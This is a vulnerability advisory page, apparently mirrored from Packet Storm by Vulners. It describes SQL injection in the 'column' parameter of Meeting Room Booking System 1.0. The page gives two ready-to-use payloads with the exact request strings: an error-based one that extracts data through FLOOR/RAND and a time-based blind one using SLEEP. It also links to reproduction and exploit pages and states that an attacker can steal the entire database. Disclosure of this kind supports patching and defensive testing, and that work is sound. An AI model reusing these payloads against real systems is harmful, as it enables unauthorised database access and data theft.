Lucene search
K

Meeting Room Booking System 1.0 SQL Injection

🗓️ 07 Sep 2023 00:00:00Reported by nu11secur1tyType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 257 Views

Meeting Room Booking System-1.0 SQL injection vulnerability, high-critical risk, allows attacker to steal database information

Code
`## Title: Meeting Room Booking System-1.0 Multiple - SQLi  
## Author: nu11secur1ty  
## Date: 09/06/2023  
## Vendor: https://www.phpjabbers.com/  
## Software: https://www.phpjabbers.com/meeting-room-booking-system/#sectionDemo  
## Reference: https://portswigger.net/web-security/sql-injection  
  
## Description:  
The column parameter appears to be vulnerable to SQL injection  
attacks. The payload ' was submitted in the column parameter, and a  
database error message was returned. The attacker easily can steal all  
information from the database of this web application!  
WARNING! All of you: Be careful what you buy! This will be your responsibility!  
  
STATUS: HIGH-CRITICAL Vulnerability  
  
[+]Payload:  
```mysql  
---  
Parameter: column (GET)  
Type: error-based  
Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)  
Payload: controller=pjFront&action=pjActionRooms&locale=1&index=2467&column=(SELECT  
6118 FROM(SELECT COUNT(*),CONCAT(0x716a717171,(SELECT  
(ELT(6118=6118,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM  
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&direction=ASC&page=1  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 time-based blind - Parameter replace  
Payload: controller=pjFront&action=pjActionRooms&locale=1&index=2467&column=(CASE  
WHEN (6735=6735) THEN SLEEP(5) ELSE 6735 END)&direction=ASC&page=1  
---  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Meeting-Room-Booking-System-1.0)  
  
## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2023/09/meeting-room-booking-system-10-multiple.html)  
  
## Time spent:  
01:47:00  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Sep 2023 00:00Current
7.1High risk
Vulners AI Score7.1
257